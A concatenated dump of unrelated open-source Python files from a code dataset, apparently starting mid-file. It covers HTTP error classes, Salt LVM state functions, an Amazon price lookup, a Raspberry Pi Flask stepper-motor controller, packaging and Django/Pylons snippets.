    """413 Request Too Large. Not used inside the server."""

    def __init__(self, descr="Request Too Large"):
        super(RequestTooLarge, self).__init__(status=413, name="Request Too Large", descr=descr)
class Censored(HTTPException):
    """451 Unavailable For Legal Reasons. Not used inside the server."""

    def __init__(self, descr="Unavailable For Legal Reasons"):
        super(Censored, self).__init__(status=451, name="Unavailable For Legal Reasons", descr=descr)
class InternalServerError(HTTPException):
    """500 Internal Server Error. The catch-all raised by the server when
    user code raises any exception not deriving from HTTPException."""

    def __init__(self, descr="Internal Server Error"):
        super(InternalServerError, self).__init__(status=500, name="Internal Server Error", descr=descr)
class NotImplemented(HTTPException):
    """501 Not Implemented.

    NOTE: the class name shadows Python's builtin ``NotImplemented``
    singleton within this module; kept for backward compatibility.
    """

    def __init__(self, descr="Not Implemented"):
        super(NotImplemented, self).__init__(status=501, name="Not Implemented", descr=descr)
class BadGateway(HTTPException):
    """502 Bad Gateway. Not used."""

    def __init__(self, descr="Bad Gateway"):
        super(BadGateway, self).__init__(status=502, name="Bad Gateway", descr=descr)
class ServiceUnavailable(HTTPException):
    """503 Service Unavailable. Raised when the "viur.disabled" flag in
    conf.sharedConf is set."""

    def __init__(self, descr="Service Unavailable"):
        super(ServiceUnavailable, self).__init__(status=503, name="Service Unavailable", descr=descr)
class ReadFromClientError(object):
    """Internal use only. Used as a **return value** (it is not raised!) to
    transport error information from fromClient in bones to the surrounding
    skeleton class.
    """

    def __init__(self, errors, forceFail=False):
        super(ReadFromClientError, self).__init__()
        # List of error descriptions, plus a flag forcing the whole
        # fromClient call to fail.
        self.errors = errors
        self.forceFail = forceFail
| viur-framework/server | errors.py | Python | lgpl-3.0 | 6,008 |
# Description: Demonstrates the use of logistic regression
# Category: classification, logistic regression
# Classes: LogRegLearner
# Uses: titanic.tab
import orange
import orngLR
data = orange.ExampleTable("titanic")
lr = orngLR.LogRegLearner(data)
correct = 0
for ex in data:
if lr(ex) == ex.getclass():
correct += 1
print "Classification accuracy:", correct/len(data)
orngLR.printOUT(lr)
| yzl0083/orange | Orange/testing/regression/tests_20/modules_logreg1.py | Python | gpl-3.0 | 431 |
# -*- coding: utf-8 -*-
'''
Management of Linux logical volumes
===================================
A state module to manage LVMs
.. code-block:: yaml
/dev/sda:
lvm.pv_present
my_vg:
lvm.vg_present:
- devices: /dev/sda
lvroot:
lvm.lv_present:
- vgname: my_vg
- size: 10G
- stripes: 5
- stripesize: 8K
'''
# Import salt libs
import salt.utils
def __virtual__():
    '''
    Only load the module if lvm is installed
    '''
    # `which` returns the binary's path (truthy) or None; returning the
    # string 'lvm' registers this state module under that virtual name.
    if salt.utils.which('lvm'):
        return 'lvm'
    return False
def pv_present(name, **kwargs):
    '''
    Set a physical device to be used as an LVM physical volume
    name
        The device name to initialize.
    kwargs
        Any supported options to pvcreate. See
        :mod:`linux_lvm <salt.modules.linux_lvm>` for more details.
    '''
    # Standard Salt state return structure.
    ret = {'changes': {},
           'comment': '',
           'name': name,
           'result': True}

    if __salt__['lvm.pvdisplay'](name):
        # Already initialised as a PV: nothing to do.
        ret['comment'] = 'Physical Volume {0} already present'.format(name)
    elif __opts__['test']:
        # Dry run: result None signals "would change".
        ret['comment'] = 'Physical Volume {0} is set to be created'.format(name)
        ret['result'] = None
        return ret
    else:
        changes = __salt__['lvm.pvcreate'](name, **kwargs)

        # Re-query to verify the creation actually took effect.
        if __salt__['lvm.pvdisplay'](name):
            ret['comment'] = 'Created Physical Volume {0}'.format(name)
            ret['changes'] = changes
        else:
            ret['comment'] = 'Failed to create Physical Volume {0}'.format(name)
            ret['result'] = False
    return ret
def pv_absent(name):
    '''
    Ensure that a Physical Device is not being used by lvm
    name
        The device name to initialize.
    '''
    ret = {'changes': {},
           'comment': '',
           'name': name,
           'result': True}

    if not __salt__['lvm.pvdisplay'](name):
        ret['comment'] = 'Physical Volume {0} does not exist'.format(name)
    elif __opts__['test']:
        # Dry run: result None signals "would change".
        ret['comment'] = 'Physical Volume {0} is set to be removed'.format(name)
        ret['result'] = None
        return ret
    else:
        changes = __salt__['lvm.pvremove'](name)

        # Success means the PV no longer shows up in pvdisplay.
        if __salt__['lvm.pvdisplay'](name):
            ret['comment'] = 'Failed to remove Physical Volume {0}'.format(name)
            ret['result'] = False
        else:
            ret['comment'] = 'Removed Physical Volume {0}'.format(name)
            ret['changes'] = changes
    return ret
def vg_present(name, devices=None, **kwargs):
    '''
    Create an LVM volume group
    name
        The volume group name to create
    devices
        A list of devices that will be added to the volume group
    kwargs
        Any supported options to vgcreate. See
        :mod:`linux_lvm <salt.modules.linux_lvm>` for more details.
    '''
    # Standard Salt state return structure.
    ret = {'changes': {},
           'comment': '',
           'name': name,
           'result': True}

    if __salt__['lvm.vgdisplay'](name):
        # VG exists: verify each listed device belongs to it, absorbing
        # orphan PVs via vgextend where possible.
        ret['comment'] = 'Volume Group {0} already present'.format(name)
        for device in devices.split(','):
            pvs = __salt__['lvm.pvdisplay'](device)
            if pvs and pvs.get(device, None):
                if pvs[device]['Volume Group Name'] == name:
                    ret['comment'] = '{0}\n{1}'.format(
                        ret['comment'],
                        '{0} is part of Volume Group'.format(device))
                elif pvs[device]['Volume Group Name'] == '#orphans_lvm2':
                    # Orphan PV: add it to this VG, then re-check.
                    __salt__['lvm.vgextend'](name, device)
                    pvs = __salt__['lvm.pvdisplay'](device)
                    if pvs[device]['Volume Group Name'] == name:
                        ret['changes'].update(
                            {device: 'added to {0}'.format(name)})
                    else:
                        ret['comment'] = '{0}\n{1}'.format(
                            ret['comment'],
                            '{0} could not be added'.format(device))
                        ret['result'] = False
                else:
                    # Bug fix: the original format string used {0} twice
                    # ('{0} is part of {0}'), repeating the device name and
                    # never showing which other VG actually owns it.
                    ret['comment'] = '{0}\n{1}'.format(
                        ret['comment'],
                        '{0} is part of {1}'.format(
                            device, pvs[device]['Volume Group Name']))
                    ret['result'] = False
            else:
                ret['comment'] = '{0}\n{1}'.format(
                    ret['comment'],
                    'pv {0} is not present'.format(device))
                ret['result'] = False
    elif __opts__['test']:
        # Dry run: result None signals "would change".
        ret['comment'] = 'Volume Group {0} is set to be created'.format(name)
        ret['result'] = None
        return ret
    else:
        changes = __salt__['lvm.vgcreate'](name, devices, **kwargs)

        if __salt__['lvm.vgdisplay'](name):
            ret['comment'] = 'Created Volume Group {0}'.format(name)
            ret['changes'] = changes
        else:
            ret['comment'] = 'Failed to create Volume Group {0}'.format(name)
            ret['result'] = False
    return ret
def vg_absent(name):
    '''
    Remove an LVM volume group
    name
        The volume group to remove
    '''
    ret = {'changes': {},
           'comment': '',
           'name': name,
           'result': True}

    if not __salt__['lvm.vgdisplay'](name):
        ret['comment'] = 'Volume Group {0} already absent'.format(name)
    elif __opts__['test']:
        # Dry run: result None signals "would change".
        ret['comment'] = 'Volume Group {0} is set to be removed'.format(name)
        ret['result'] = None
        return ret
    else:
        changes = __salt__['lvm.vgremove'](name)

        # Success means the VG no longer shows up in vgdisplay.
        if not __salt__['lvm.vgdisplay'](name):
            ret['comment'] = 'Removed Volume Group {0}'.format(name)
            ret['changes'] = changes
        else:
            ret['comment'] = 'Failed to remove Volume Group {0}'.format(name)
            ret['result'] = False
    return ret
def lv_present(name,
               vgname=None,
               size=None,
               extents=None,
               snapshot=None,
               pv='',
               **kwargs):
    '''
    Create a new logical volume
    name
        The name of the logical volume
    vgname
        The volume group name for this logical volume
    size
        The initial size of the logical volume
    extents
        The number of logical extents to allocate
    snapshot
        The name of the snapshot
    pv
        The physical volume to use
    kwargs
        Any supported options to lvcreate. See
        :mod:`linux_lvm <salt.modules.linux_lvm>` for more details.
    '''
    ret = {'changes': {},
           'comment': '',
           'name': name,
           'result': True}

    _snapshot = None

    if snapshot:
        # NOTE(review): when `snapshot` is given, `name` is treated as the
        # origin volume and `snapshot` becomes the LV to create — the two
        # are swapped here. Confirm against lvm.lvcreate's signature.
        _snapshot = name
        name = snapshot

    lvpath = '/dev/{0}/{1}'.format(vgname, name)

    if __salt__['lvm.lvdisplay'](lvpath):
        ret['comment'] = 'Logical Volume {0} already present'.format(name)
    elif __opts__['test']:
        # Dry run: result None signals "would change".
        ret['comment'] = 'Logical Volume {0} is set to be created'.format(name)
        ret['result'] = None
        return ret
    else:
        changes = __salt__['lvm.lvcreate'](name,
                                           vgname,
                                           size=size,
                                           extents=extents,
                                           snapshot=_snapshot,
                                           pv=pv,
                                           **kwargs)

        if __salt__['lvm.lvdisplay'](lvpath):
            ret['comment'] = 'Created Logical Volume {0}'.format(name)
            ret['changes'] = changes
        else:
            ret['comment'] = 'Failed to create Logical Volume {0}'.format(name)
            ret['result'] = False
    return ret
def lv_absent(name, vgname=None):
    '''
    Remove a given existing logical volume from a named existing volume group

    name
        The logical volume to remove

    vgname
        The volume group name
    '''
    ret = {'changes': {},
           'comment': '',
           'name': name,
           'result': True}

    lvpath = '/dev/{0}/{1}'.format(vgname, name)

    # Already absent: nothing to change.
    if not __salt__['lvm.lvdisplay'](lvpath):
        ret['comment'] = 'Logical Volume {0} already absent'.format(name)
        return ret

    # Dry-run mode: report the pending removal only.
    if __opts__['test']:
        ret['comment'] = 'Logical Volume {0} is set to be removed'.format(name)
        ret['result'] = None
        return ret

    changes = __salt__['lvm.lvremove'](name, vgname)
    # Confirm removal before reporting success.
    if __salt__['lvm.lvdisplay'](lvpath):
        ret['comment'] = 'Failed to remove Logical Volume {0}'.format(name)
        ret['result'] = False
    else:
        ret['comment'] = 'Removed Logical Volume {0}'.format(name)
        ret['changes'] = changes
    return ret
| CSSCorp/openstack-automation | file_root/_states/lvm.py | Python | gpl-2.0 | 8,799 |
#!/usr/bin/env python
"""This script demonstrates how the amazonproduct API can be used to look up
the price of an item.
The amazon product API is available from here:
https://bitbucket.org/basti/python-amazon-product-api/
"""
import time
import amazonproduct
# Module-level client for the US Amazon Product Advertising API.
api = amazonproduct.API(locale='us')
def lookup_item(keywords):
    """Look up an Amazon item by keyword search.

    Returns a 4-tuple ``(title, asin, lowest_new_price, lowest_used_price)``
    for the first search result.  The price fields are ``None`` when the
    item has no new/used offers.  On any search failure, or when there are
    no results, returns ``('', '', '', '')`` (deliberately best-effort).
    """
    try:
        items = api.item_search('All', ResponseGroup='OfferSummary, Small',
                                Keywords=keywords)
        # we'll assume it's the first - not much more we can do in an
        # automated fashion
        for item in items:
            asin = item.ASIN
            title = item.ItemAttributes.Title
            offerSummary = item.OfferSummary
            # Offer nodes are absent when the item has no offers of that
            # kind; accessing a missing attribute raises AttributeError.
            # Bug fix: the original used bare `except:` here, which also
            # swallowed SystemExit/KeyboardInterrupt.
            try:
                lowestNewPrice = offerSummary.LowestNewPrice.FormattedPrice
            except AttributeError:
                lowestNewPrice = None
            try:
                lowestUsedPrice = offerSummary.LowestUsedPrice.FormattedPrice
            except AttributeError:
                lowestUsedPrice = None
            return title.text.encode('utf-8'), asin, lowestNewPrice, lowestUsedPrice
    except Exception:
        # Best-effort fallback kept from the original (was a bare except);
        # API/network errors fall through to the empty result below.
        pass
    return '', '', '', ''

# URL template for a product page, keyed by ASIN.
amazon_url = "http://www.amazon.com/dp/%s"
| moshekaplan/lookup_amazon_prices | lookup_prices.py | Python | mit | 1,202 |
from flask import (Flask, render_template, request, flash)
import RPi.GPIO as GPIO
import os
import time
import threading
import thread
from threading import Thread
app = Flask(__name__)

# Use Broadcom (BCM) channel numbering for all GPIO calls below.
GPIO.setmode(GPIO.BCM)

##PINS
# Stepper motor coil pins: two coils (A and B), two ends each.
coil_A_1_pin = 17
coil_A_2_pin = 22
coil_B_1_pin = 24
coil_B_2_pin = 23
pin_button = 18  # end-stop button; configured with pull-up, reads 0 when pressed
pin_led = 21     # status LED
pin_ldr = 3      # light sensor, sampled via RC-charge trick in checkLight()
GPIO.setwarnings(False)
GPIO.setup(coil_A_1_pin, GPIO.OUT)
GPIO.setup(coil_A_2_pin, GPIO.OUT)
GPIO.setup(coil_B_1_pin, GPIO.OUT)
GPIO.setup(coil_B_2_pin, GPIO.OUT)
GPIO.setup(pin_button, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(pin_led, GPIO.OUT)
# Coil energising pattern for one rotation direction ('1' = coil end on).
forward_seq = ['1000', '0100','0010', '0001']
#GLOBAL VARIABLES
# NOTE(review): a `global` statement at module level is a no-op; kept as-is.
global end_reach
end_reach = 0  # set to 1 by down() when the bottom position is reached
rotate_max = 3  # revolutions per run; 512 steps below correspond to one revolution
ball_max = (512 * rotate_max)  # NOTE(review): not referenced elsewhere in this file - confirm unused
light_on = 0  # NOTE(review): not referenced elsewhere in this file - confirm unused
foo = 0  # NOTE(review): not referenced elsewhere in this file - confirm unused
default_ball_delay = (2.5 / 1000.0)  # seconds to wait between coil steps
work = 1  # NOTE(review): not referenced elsewhere in this file - confirm unused
global stop_now
stop_now = 0  # set to 1 by stop() to abort a running movement thread
reverse_seq = list(forward_seq) # to copy the list
reverse_seq.reverse() #reverse for downwards
def checkLight ():
    """Sample the LDR pin once; return 1 if it reads LOW after the
    discharge/settle cycle, else 0.

    NOTE(review): callers treat a return of 1 as "there is light"; whether
    LOW-after-0.5s actually means light or dark depends on the LDR/capacitor
    wiring - confirm against the hardware.
    """
    # Discharge capacitor
    GPIO.setup(pin_ldr, GPIO.OUT)
    GPIO.output(pin_ldr, GPIO.LOW)
    measurement = 0
    time.sleep(0.5)
    GPIO.setup(pin_ldr, GPIO.IN)
    # Count loops until voltage across
    # capacitor reads high on GPO
    if(GPIO.input(pin_ldr) == GPIO.LOW):
        measurement = 1
    return measurement
#CHECK IF BTN IS PRESSED
def checkState():
    # Pull-up input: returns 0 when the button is pressed, 1 when released.
    return GPIO.input(pin_button)
#TURN LED LIGHT ON / OFF
def turnLightOn():
    """Switch the status LED on, then settle briefly."""
    GPIO.output(pin_led, GPIO.HIGH)
    time.sleep(0.2)
def turnLightOff():
    """Switch the status LED off, then settle briefly."""
    GPIO.output(pin_led, GPIO.LOW)
    time.sleep(0.2)
#MOTOR MOVE FUNCTIONS
#MOVE UP
def up(delay, steps):
    """Drive the motor upwards for `steps` steps, `delay` seconds per coil step.

    Breaks out early when the end-stop button reads pressed; exits the
    worker thread when the global stop flag is set.
    """
    # Bug fix: the global declaration must precede any use of the name.
    # The original declared `global stop_now` after first reading it,
    # which is a SyntaxWarning on Python 2 and a SyntaxError on Python 3.
    global stop_now
    for i in range(steps):
        if(checkState() == 0):
            break
        for step in reverse_seq:
            if(stop_now == 1):
                stop_now = 0
                # thread.exit() raises SystemExit, so the GPIO.cleanup()
                # that followed it in the original could never execute;
                # it is dropped here (not reordered) to keep behaviour
                # identical - cleanup would reset pins the app still needs.
                thread.exit()
            else:
                set_step(step)
                time.sleep(delay)
#MOVE DOWN
def down(delay, steps):
    """Drive the motor downwards for `steps` steps, `delay` seconds per coil step.

    Marks the global end_reach flag when a full run (512 * rotate_max steps)
    has been performed; exits the worker thread when the stop flag is set.
    """
    # Bug fix: both globals were declared after their first use in the
    # original (SyntaxWarning on Python 2, SyntaxError on Python 3);
    # declare them up front instead.
    global end_reach
    global stop_now
    for i in range(steps):
        if(i == (512*rotate_max)):
            end_reach = 1
            time.sleep(0.2)
        for step in forward_seq:
            if(stop_now == 1):
                stop_now = 0
                # As in up(): the GPIO.cleanup() after thread.exit() in the
                # original was unreachable and has been dropped.
                thread.exit()
            else:
                set_step(step)
                time.sleep(delay)
#COMBO FUNCTION: UP & DOWN (PARAMETERS ROTATIONS (512*rotations))
def move(start, rotations):
    """Move "up" or "down" by the given number of revolutions (512 steps each)."""
    step_count = 512 * rotations
    if start == "up":
        up(default_ball_delay, step_count)
    elif start == "down":
        down(default_ball_delay, step_count)
##CHECK WHERE I AM
def up_or_down():
    """Decide the next move: climb back up if the bottom was reached,
    otherwise descend when there is light and the end-stop reads pressed."""
    # Bug fix: `global end_reach` must come before the first read of
    # end_reach (the original declared it after the comparison, which is a
    # SyntaxWarning on Python 2 and a SyntaxError on Python 3).
    global end_reach
    if(end_reach == 1):
        time.sleep(0.2)
        end_reach = 0
        up(default_ball_delay, (600*rotate_max))
    elif(checkLight() == 1):
        if(checkState() == 0):
            down(default_ball_delay, (512*rotate_max))
#RETURN TOP credits: Mustafa uit groep 31
def goHome():
    """Step upwards one step at a time until the end-stop button reads pressed."""
    while checkState() != 0:
        up(default_ball_delay, 1)
##FUNCTIONS TO RUN MOTOR.
def run():
    """One animation cycle: brief pause, move up 3 revolutions, then decide the next move."""
    time.sleep(0.2)
    move("up", 3)
    up_or_down()
#ANIMATE THE RUN IN WHILE TRUE TO GO UNTIL LIGHT IS OFF.
def animate():
    """Main animation loop: while there is light (and no stop request),
    keep running cycles; when the light goes off, park at the top."""
    while True:
        while (checkLight() == 1 and stop_now == 0): ##only allowed to move once there is light
            turnLightOn()
            time.sleep(4.5) ##per-Pi delay so the Pis together create the animation
            set_step('0000')
            run()
        else:
            # while/else: this branch runs whenever the inner loop ends
            # without a break, i.e. light went off or stop_now was set.
            turnLightOff()
            goHome()
def stop():
    """Request any running movement loop to abort (flag checked in up()/down())."""
    global stop_now
    stop_now = 1
def set_step(step):
    """Energise the four stepper coil pins from a 4-character '0'/'1' pattern."""
    coil_pins = (coil_A_1_pin, coil_A_2_pin, coil_B_1_pin, coil_B_2_pin)
    for pin, bit in zip(coil_pins, step):
        GPIO.output(pin, bit == '1')
##FLASK CODE STARTS HERE EACH BUTTON REPRESENTS A PAGE.
@app.route("/")
def index():
    """Serve the control panel page."""
    return render_template('index.htm')
@app.route("/led_off.htm")
def led_off():
    """Turn the status LED off, then re-render the control panel."""
    turnLightOff()
    return render_template('index.htm')
@app.route("/led_on.htm")
def led_on():
    """Turn the status LED on, then re-render the control panel."""
    turnLightOn()
    return render_template('index.htm')
@app.route("/home.htm")
def go_home():
    """Drive the ball back up to the end-stop (blocks until it arrives)."""
    goHome()
    return render_template('index.htm')
@app.route("/auto_on.htm")
def auto_on():
    """Clear the stop flag and start the animation loop in a background thread."""
    ##turnLightOn()
    global stop_now
    stop_now = 0
    thread.start_new_thread(animate, ())
    return render_template('index.htm')
@app.route("/auto_off.htm")
def auto_off():
    """Signal the animation thread to stop at its next flag check."""
    ##turnLightOff()
    stop()
    return render_template('index.htm')
@app.route("/shutdown.htm")
def shutdown():
    """Power the Pi off via the shell (requires passwordless sudo)."""
    os.system("sudo poweroff")
    return render_template('index.htm')
@app.route("/reboot.htm")
def reboot():
    """Reboot the Pi via the shell (requires passwordless sudo)."""
    os.system("sudo reboot")
    return render_template('index.htm')
@app.route("/down.htm", methods=['GET'])
def go_down():
    """Move down by the number of steps given in the 'steps' query argument."""
    steps = int(request.args.get('steps'))
    down(default_ball_delay, steps)
    return render_template('index.htm')
@app.route("/up.htm", methods=['GET'])
def go_up():
    """Move up by the number of steps given in the 'steps' query argument."""
    steps = int(request.args.get('steps'))
    up(default_ball_delay, steps)
    return render_template('index.htm')
@app.route("/xpos.htm")
def xpos():
x = open('/boot/x.txt', 'r')
for line in x:
print line
return line
@app.route("/ypos.htm")
def ypos():
y = open('/boot/y.txt', 'r')
for line in y:
print line
return line
if __name__ == '__main__':
    # Serve on all interfaces with the debug reloader enabled.
    app.run(host='0.0.0.0', port=5000, debug=True)
    # Only reached once the development server exits; releases all pins.
    GPIO.cleanup()
from setuptools import setup
# Package metadata and install configuration for facebook_downloader.
setup(name='facebook_downloader',
      version='0.1',
      description='API wrapper and crawler to download page posts from the Facebook Graph API',
      url='http://github.com/coej/facebook_downloader',
      author='Chris Jenkins',
      author_email='chrisoej@gmail.com',
      license='MIT',
      packages=['facebook_downloader'],
      install_requires=[
          'pymongo',
          'requests',
          'future',
      ],
      # dependency_links=['http://github.com/user/repo/tarball/master#egg=package-1.0']
      # for stuff not on pypi
      # Ship files listed in MANIFEST.in along with the package.
      include_package_data=True,
      # Install as a plain directory rather than a zipped egg.
      zip_safe=False)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import js2xml
import os
TEST_DIR = os.path.dirname(__file__)

# Sample scripts to parse, smallest to largest.
_SAMPLE_NAMES = [
    "samples/fullcalendar.js",
    "samples/fullcalendar.min.js",
    "samples/jquery.min.js",
]
files = [os.path.join(TEST_DIR, name) for name in _SAMPLE_NAMES]

# Parse each sample in turn; this module exists to be profiled.
for filename in files:
    with open(filename) as f:
        jscode = f.read()
        tree = js2xml.parse(jscode)
import logging
import hashlib
from pylons import request, response, session, tmpl_context as c
from pylons.controllers.util import abort, redirect_to, etag_cache
from pylons.decorators import jsonify
from pylons.i18n.translation import _
from wurdig.lib.base import BaseController, render
log = logging.getLogger(__name__)
class JsController(BaseController):
    """Serves translated UI strings to client-side JavaScript."""

    @jsonify
    def _json(self):
        """Build the translation table; @jsonify serialises it to JSON.

        The leading underscore keeps this action private (not routable).
        NOTE: the dict entries are kept in the original source order, since
        the serialised text feeds the ETag hash in translations().
        """
        translations = {
            'Are you positive you want to do that?': _('Are you positive '
                                                       'you want to do that?'),
            'The item has successfully been deleted.': _('The item has '
                                                         'successfully been deleted.'),
            'Disapprove': _('Disapprove'),
            'The item has successfully been approved.': _('The item has '
                                                          'successfully been approved.'),
            'Approve': _('Approve'),
            'The item has successfully been disapproved.': _('The item has successfully '
                                                             'been disapproved.'),
            'Your+request+has+been+completed+successfully': _('Your+request+has+been+'
                                                              'completed+successfully'),
            'An unexpected error has occurred.': _('An unexpected error has occurred.'),
            'Enter key word(s)': _('Enter key word(s)')
        }
        return translations

    def translations(self):
        """Return a JS snippet that defines WURDIG.translate, with ETag caching."""
        payload = "if(!this.WURDIG) {var WURDIG = {};}WURDIG.translate = %s" % self._json()
        # etag_cache short-circuits with 304 when the client already has
        # this exact payload.
        etag_cache(key=hashlib.md5(payload).hexdigest())
        response.content_type = 'application/x-javascript; charset=utf-8'
        response.cache_control = 'max-age=2592000'
        response.pragma = ''
        return payload
from rest_framework import serializers
from recipemaster.recipes.models import Recipe, Tag
class TagSerializer(serializers.ModelSerializer):
    """Serialises Tag instances, exposing title, slug and color."""
    class Meta:
        model = Tag
        fields = ('title', 'slug', 'color')
class RecipeSerializer(serializers.ModelSerializer):
    """Serialises Recipe instances with their tags nested (read-only)."""
    # Nested representation; tags cannot be created/updated through this field.
    tags = TagSerializer(many=True, read_only=True)

    class Meta:
        model = Recipe
        fields = ('title', 'url', 'tags')
| agnethesoraa/recipemaster | recipemaster/recipes/serializers.py | Python | mit | 413 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.